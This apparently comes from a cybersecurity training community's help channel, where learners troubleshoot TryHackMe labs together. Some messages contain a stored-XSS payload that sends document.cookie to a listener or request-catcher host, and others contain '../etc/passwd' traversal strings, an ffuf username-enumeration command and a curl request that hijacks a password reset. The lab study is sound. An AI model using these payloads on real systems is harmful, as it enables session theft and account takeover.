@steel nymph disregard... figures the second i post for help i'd see the error -_-

i forgot to change the dumb information_schema

any fixes for xss task 8?

What you mean with fix?

I mean is there any more info about automatization of admin, I restarted machine three times, on first attempt listened for ~30min then two time for 10min

Oh, have you tried if you receive the request if you open the ticket on your own? So just to verify your payload is working?

Yes, I have received my own cookie

Okay, then maybe try it on the attackbox or with the request catcher. People reported it's working better with these 2 options.

okay, i'll try that now

Who is the author of Exploit-DB?

johnny long should be the answer

but it is not

any hints?

Johnny Long was the creator and author of Google Hacking Database.

edited for clarity

where should I look for the answer?

when looking for information about a website or people associated with it I always look for an 'about us' page or something similar.

got the answer

In my case I check the history of exploitdb

after about 15 min on attack box - nothing (only my own cookie), i'll try request catcher next

okay

Anyone have any issues with the crontab task in the linux privilege's escalation room??

What is the most common mistake because I don't see where I am making the issue

Who the **** creates a backup files for a crontab and doesn't make it executable. The hell kinda admin is this

could someone give me a hint for xss task 8 i have started netcat on 9001 and am posting || </textarea><script>fetch('http://10.10.224.220?cookie=' + btoa(document.cookie) );</script> || in the text area of the ticket and not getting anything on my port

what about the payload

i tried adding :9001 after the ip

|| </textarea><script>fetch('http://10.10.224.220:9001?cookie=' + btoa(document.cookie) );</script>|| like this?

or adding a / before the ?

oh the ip i am using rn was wrong but when i was doing it last night i know i was using the right ip but i still wasnt getting it ill try again

okay i switched the ip and i am still not getting anything, ill stil wait i guess

and send what?

the payload?

my vpn or the box

okay

yes it is

thats my tun0

yeah

idk maybe its bugged

its okay

okay

i tried last night and it wasnt working

maybe ill try the catcher

got it with the catcher

wait maybe not

i got this

when running this || </textarea><script>fetch('http://a791fd7267ad5efeaa23890b083a763c.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script> ||

yeah because i opened the page where is says "listening for requests ..."

its just http requests from my ip getting the html

i just get the dns

yeah if i run || </textarea><script>fetch('http://a791fd7267ad5efeaa23890b083a763c.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script> || i get

i got it

finally lol

thank you

thanks for your help as well

Gave +1 Rep to @steel nymph

so thx

Gave +1 Rep to @drifting drum

I'm quite new to using ffuf - When executing the command it's encountered 1 error ( -u flag or -request flag is required). Even though I've declared it with the full URL afterwards. Any suggestions?

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x" - H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.170.82:80/customers/signup -mr "username already exists" -o valid_username.txt

I attempted without port also ^

Cheers bud - I'll do some trouble shooting.

Hey guys, I'm working on the NFS section of the Linux PrivEsc section. I have the exploit created and I've mounted the share but running ./exploit does not give me root. Any ideas?

the exploit is in my own /tmp/attack directory and I am in the /tmp directory on karens system

do both exploit.c and the compiled exploit both need to be created by root?

I changed the permissions to include suid permissions

FYI - I changed the placement of the -u to be before the -H flag and this worked.

Oh, do I need to change the permissions on karens machine as well?

Yeah, just realized. So should I be the owner or should root be the owner?

Got it. I guess it didnt add the +s correctly on my side. Thanks as always for your excellent help @steel nymph

Gave +1 Rep to @steel nymph

There is a space between - and H. Remove that.

I don't think that is related. Remove that space between - and H and try again.

Thank you - I removed the space and same error message appeared to declare -u flag

Gave +1 Rep to @wispy nimbus

Hello, i'm stuck on File Inclusion -> Challenge -> Task2
So far i got to this point:

File Content Preview of admin
Welcome admin
This is a admin web page! Get the flag!

I really dont know what to do, i spent 1h looking and that and playing with cookie...

Hahaha, good one, got it 😄

Omg i'm stupid

This is your command after the space got removed:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.170.82:80/customers/signup -mr "username already exists" -o valid_username.txt
You should not get an error about the -u flag.
Now, you are still not going to get any results because your -d flag is not complete.

Not sure where I'm going wrong for Lab1 but I keep getting the path wrong.
||/lab1.php?file=/etc/passwd||

Tryhackme doesn't think so lol

Still on same question. LfI inclusion last task.

When I enter the path it tells me "Uh Oh! undefined"

Stomped 2 days

I'm 100% using bitdefender and as you said that noticed every time I enter the answer I get a bitdefender notice someone is trying to access my files.

Thank you for that!

Gave +1 Rep to @steel nymph

Im on flag 1

What?

Im fresh fresh

Any sites with correct syntax. Thats my problem.

Yes

#room-help message

Send post request with file parameter

I know something with post -x

I tried in burp

Dont kno how to do in in browser

how did you try in burp? what steps did you take?

thank you

Gave +1 Rep to @wispy nimbus

Proxy, send to repeater. Changed get to post with ?file=../../../../etc/flag1

name1=value1&name2=value2.... will this come up after send. Dobi type this and are the values the same, and if not where do I get that info?

Ok

Ill get it eventually..lol

if you go to the network tab of dev tools. you can export the request as a curl and import it into postman. then you can fool with it. and continue to be stuck (that's where I am atm).

Lol

How did you get that?

File=hello world.. any rooms on THM that goes over this?

I just want to make sure I'm on the right track on LFI lab2. For entering the file name ||../../../../etc/passwd|| or did I miss the mark what I'm suppose to be looking for.

Yes

Yea, after I entered that from above it gave me the file contents to preview. I thought the answer was somewhere in there.

I feel so stupid after reading that lol. Thank you

Gave +1 Rep to @steel nymph

One of those instances of looking for a puzzle that wasn't there.

Wowwwwww. That easy. It was slapping me in the face the whole time

What tool can I use to automate the requests in Time based SQL room?

I found the columns as || username, password, id|| and was able to know ||username = admin|| from the ||table_name=users||

Finding the value in ||password|| column is tiring me out

||I tried all the 52 alphabets but the password doesn't start with those apparenlty.||

You can simply input some random string in the input tag and see the url, there should be that file=helloworld
f.e if you search the word random on Google you'll see in the url q=random

Perhaps somebody experienced the same... Burp Intruder, Task 12 CSRF Token Bypass. After creating Macro according to the guide I am still getting static session cookie and loginToken (as per intercepted original). Can't get my head around what is wrong, checked multiple times and all seems as per guide

just a question about SQL, if there's '%' it will register as any string, right?

after some research, the answer is yes

Ok got around that. It appeared that issue was related to 'URL Scope'. It should be set either Target Scope globally, or selected 'Include all URLs' 👍

Yes. The % is a wildcard in SQL

How to get a 500 Internal Server Error in the Burp Repeater task?
I'm pretty sure I maxed out the URL parameter i.e. /products/<param>
I put it as || '9' * 4096|| which is the maximum. One more digit more and It'll return ||414 URI too long|| error.
Any help?

Wait, Nvm, I'm just little dumb

nmap -sV scan and it gives back service mysql? version empty, what is another way of knowing what kind of database is running?

Try nmap --script=mysql-info [IP]

thankyou it worked!

guys

anyone having problems with the sc query windefend command powershell? I't doesn't print anything

Try in cmd

that worked. ty

Gave +1 Rep to @shadow echo

I am doing File Inclusion Lab #Challenge 3, I am stumped spent over a day, its locked down well with regex, looked around the internet looked up about $_REQUEST, Can't find any reference in the code anywhere to $_REQUEST, no luck, tried all the tricks I know and plenty I didn't. Any ideas why its not giving up the goods? 10.10.x.x/challenges/chall3.php&file=xxx

Time to become the postman

can anyone help me with the logic flow in authentication bypass lab? for some reason i can get the flag from robert's support ticket

i did follow all the steps

sure, i'm starting the machine up right now

thanks

if you've followed the steps correctly, you should be able to get a ticket on your account containing a link to login as Robert

did you get that ticket?

no i didn't

i'll try again

remember to use the email address given to your account in the website

that particular email address must be used, otherwise you wouldn't be able to receive the ticket

would you mind showing the curl request command you've used?

sure

curl 'http://10.10.144.63/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=robert@customer.acmeitsupport.thm'

remember to use the email address given to your account in the website
when you send a valid request for resetting an account's password, the website would send a ticket to the email address of an account, which contains the link for logging into the account with the resetted password

the problem with this is that you could control which email address the website sends the ticket to

as the attacker, you'd want the website to send it to the email address of your account so that you could log into another person's account

there's a particular part of your curl request that you need to change so that the website sends the ticket to your account's email address

so basically you have to create an account with a legit email then use that email in the curl request

the email address you need to use is given to you in the website, under your account settings

once you've created a new account and logged in, check its settings, and you should see an email address there

that's the one you need to use for performing the attack

i login using steve's credentials i got when doing the brute force attack an in the account setting there is an email

can i use that one?

that should work i think

ok let me try

the email address to use is the one in 'Support Tickets', not the one in 'Your Account'

it could be a little confusing haha

i can confirm this method works

yeah it works indeed!

thank you so much for your help

:)

let's connect on linkedin

i don't have a linkedin account lol

all good!

maybe i could see yours? lol

www.linkedin.com/in/odilon-nguemou

agh, i have to create an account now because LinkedIn wouldn't let me view your profile

well feel free to connect anytime

do you have any cert? CEH, Comptia Pentest+?

well feel free to connect anytime
sure!
do you have any cert? CEH, Comptia Pentest+?
not yet, but i'm working to get my eJPT by the coming weekend

cool! that's a good one

i've started studying for it

but i'll prep for the CEH and Pentest+ first as they are more recognize in the industry

once i'm done with the eJPT, i think my next target would be CCNA R&S, CCSK or eNDP

cool well good luck

hi @astral marlin
could you help list down your step for get that flag?
i did follow your discuss , but not yet get that flag.

which part of the task are you stuck on?

u will pass ejpt easily :)

the logic flow in authentication bypass lab? i cant get the flag from robert's support ticket

start studying for ccna or others 🐬

dont worry for ejpt

did you get a ticket containing a link to access Robert's account after you've resetted his password?

yeah the CCNA seems to have a pretty good reputation among employers

it's definitely something on my bucket list

ejpt u will pass no doubts in dat

just do some quick labs on thm like junior pentestinf and all

ur good to go

after resetted see only status alert we'll send you reset email to robert@acmeitsupport.thm and not get any link

@shy wasp you need to use the support ticket email address of an account you've created or an account you've compromised on that website

I assume this is a reference to POST? which I gave a fairly good flogging of but it returned nothing. I have a double issue that the VPN persistently goes down to try-hack-me lasting maybe a minute and it must be restarted at every attempt practically.

we want to exploit the logic flaw in the website so that it ends up sending the password reset ticket to an account we can access instead of to Robert's account

maybe try changing the OpenVPN server to connect to or use the AttackBox to send the LFI request?

Joker's hint leads you on the correct track

Linux PrivEsc: Task 5 help? (spoilers, ye be warned) ||I have the http server setup, I have the exploit on my attackbox ready to be wget'd, but every time I try to wget the exploit using karen's account I always get permission denied. I'm sure I am doing something wrong here, any nudges or just flat out answers? Its killing me.||

Noted, I do use the attack box but its a bit more clumsy at times. I could change the VPN server Could its a local server, I had a couple of months of hassle free engagement, then nothing but constant trouble.

which directory are you on in Karen's machine? i have a feeling that's related

I read a few posts about that just now and went all around the directory spamming my wget so far I've gotten no dice

Saying I can't write to the exploit when I try to wget it

@turbid sun

ok thx on tip, rebooting VM its been a while I suspect.

Gave +1 Rep to @turbid sun

this is what i'm suspecting

i've encountered this error before and it's because i was in a directory i couldn't write to

the fix is to cd to a directory you have write permissions for

I'll see if I can sort that out 🤔 thanks for the tip @turbid sun I'll be back if I have trouble

Gave +1 Rep to @turbid sun

https://tenor.com/view/fire-flame-look-what-i-have-created-shout-gif-17812125

it worked

yoooo

Now to figure out how to actually run it

🤔

I did it

I am root

The days of suffering are over

Hi ya'll . I need your help @hard jungle , @primal whale . The machine on "Subdomain Enumeration" is not starting . The ip address is not populating here 👉 (http://MACHINE_IP ) How do I resolve this ?

Hey @oak shard , I suggest you terminate the machine and deploy a new one. That's may help fixing the issue.

Let me try

Hi , I have tried that thrice . Nothing has changed . Let me give it another go.

it sounds like a THM bug on the client side

sometimes the IP address doesn't get populated for me as well

perhaps file a report in #site-bugs?

Thank you.

Gave +1 Rep to @turbid sun

Hmm weird timing but

I cannot connect to the Task 6 machine